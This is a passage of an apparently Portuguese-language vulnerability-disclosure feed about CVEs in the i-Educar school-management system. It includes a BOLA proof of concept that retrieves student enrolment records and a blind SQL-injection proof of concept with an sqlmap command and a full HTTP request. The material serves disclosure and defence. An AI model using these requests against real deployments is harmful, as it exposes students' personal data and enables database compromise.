  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9686.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9686.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 30 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9687</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9687/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9687/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9687-broken-object-level-authorization-bola-permite-a-enumeração-de-alunos-via-modulehistoricoescolarprocessamentoapi&amp;#34;&amp;gt;CVE-2025-9687: Broken Object Level Authorization (BOLA) permite a enumeração de alunos via &amp;lt;code&amp;gt;/module/HistoricoEscolar/processamentoApi&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9687&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9687&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada no endpoint &amp;lt;code&amp;gt;/module/HistoricoEscolar/processamentoApi&amp;lt;/code&amp;gt; do aplicativo i-Educar.
Essa falha permite que usuários com poucos privilégios (por exemplo, contas padrão de alunos/responsáveis) recuperem informações de matrícula (&amp;lt;code&amp;gt;matrículas&amp;lt;/code&amp;gt;) de alunos fora de seu escopo, expondo Informações Pessoais Identificáveis ​​(PII) sem as devidas verificações de autorização.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9687-broken-object-level-authorization-bola-permite-a-enumeração-de-alunos-via-modulehistoricoescolarprocessamentoapi&amp;#34;&amp;gt;CVE-2025-9687: Broken Object Level Authorization (BOLA) permite a enumeração de alunos via &amp;lt;code&amp;gt;/module/HistoricoEscolar/processamentoApi&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9687&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9687&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada no endpoint &amp;lt;code&amp;gt;/module/HistoricoEscolar/processamentoApi&amp;lt;/code&amp;gt; do aplicativo i-Educar.
Essa falha permite que usuários com poucos privilégios (por exemplo, contas padrão de alunos/responsáveis) recuperem informações de matrícula (&amp;lt;code&amp;gt;matrículas&amp;lt;/code&amp;gt;) de alunos fora de seu escopo, expondo Informações Pessoais Identificáveis ​​(PII) sem as devidas verificações de autorização.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint Vulnerável:&amp;lt;/br&amp;gt;&amp;lt;/b&amp;gt;&amp;lt;code&amp;gt;GET /module/HistoricoEscolar/processamentoApi&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não consegue aplicar a &amp;lt;b&amp;gt;autorização em nível de objeto&amp;lt;/b&amp;gt; ao manipular este endpoint. Como resultado, qualquer usuário autenticado pode manipular os valores da solicitação para acessar informações confidenciais (nomes, IDs, status de matrícula) dos alunos.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Autentique como um usuário sem privilégios (por exemplo, aluno, professor).&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9687/image.png&amp;#34;
	width=&amp;#34;1336&amp;#34;
	height=&amp;#34;537&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9687/image_hu_f939c8d7ab530bb6.png 480w, /p/cve-2025-9687/image_hu_8ff6dd6f967a559d.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;248&amp;#34;
		data-flex-basis=&amp;#34;597px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Envie a seguinte requisição:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/HistoricoEscolar/processamentoApi?att=matriculas&amp;amp;amp;oper=get&amp;amp;amp;instituicao_id=1&amp;amp;amp;escola_id=4&amp;amp;amp;curso_id=3&amp;amp;amp;serie_id=5&amp;amp;amp;turma_id=23&amp;amp;amp;ano=2025&amp;amp;amp;busca=S HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=&amp;amp;lt;low-privileged-session&amp;amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9687/image-1.png&amp;#34;
	width=&amp;#34;1567&amp;#34;
	height=&amp;#34;714&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9687/image-1_hu_226565e8d4a9024e.png 480w, /p/cve-2025-9687/image-1_hu_ac9f38053b5efe51.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;219&amp;#34;
		data-flex-basis=&amp;#34;526px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Pudemos observar que informações sobre os alunos foram retornadas.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Esta vulnerabilidade é um problema de Broken Object Level Authorization (BOLA) (OWASP API Top 10 - 2023, A01), permitindo a exposição de dados sensíveis. Qualquer usuário autenticado pode acessar informações pessoais de outros usuários. Isso pode levar a:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Acesso não autorizado a PII sensíveis;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Violação das leis de proteção de dados (por exemplo, LGPD, GDPR);&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Possível abuso de dados do usuário ou personificação;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Enumeração de usuários.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9687.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9687.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 30 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9606</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9606/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9606/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9606-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-cod_agenda-do-endpoint-agenda_preferenciasphp&amp;#34;&amp;gt;CVE-2025-9606: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;agenda_preferencias.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9606&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9606&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;agenda_preferencias.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9606-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-cod_agenda-do-endpoint-agenda_preferenciasphp&amp;#34;&amp;gt;CVE-2025-9606: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;agenda_preferencias.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9606&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9606&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;agenda_preferencias.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;agenda_preferencias.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;comando&amp;#34;&amp;gt;Comando:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sqlmap -r req.txt --risk=3 --level=5 --dbs --dbms=PostgreSQL --batch 
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;exemplo-de-requisição&amp;#34;&amp;gt;Exemplo de Requisição
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;20
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;POST /intranet/agenda_preferencias.php HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: application/x-www-form-urlencoded
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 60
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Origin: http://localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/intranet/agenda_preferencias.php
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: [COOKIE]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;tipoacao=Editar&amp;amp;amp;cod_agenda=2&amp;amp;amp;envia_alerta=0&amp;amp;amp;agenda_display=2
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9606/image.png&amp;#34;
	width=&amp;#34;806&amp;#34;
	height=&amp;#34;1023&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9606/image_hu_c74740e10125555c.png 480w, /p/cve-2025-9606/image_hu_f0d4a2c4c2aae934.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;78&amp;#34;
		data-flex-basis=&amp;#34;189px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
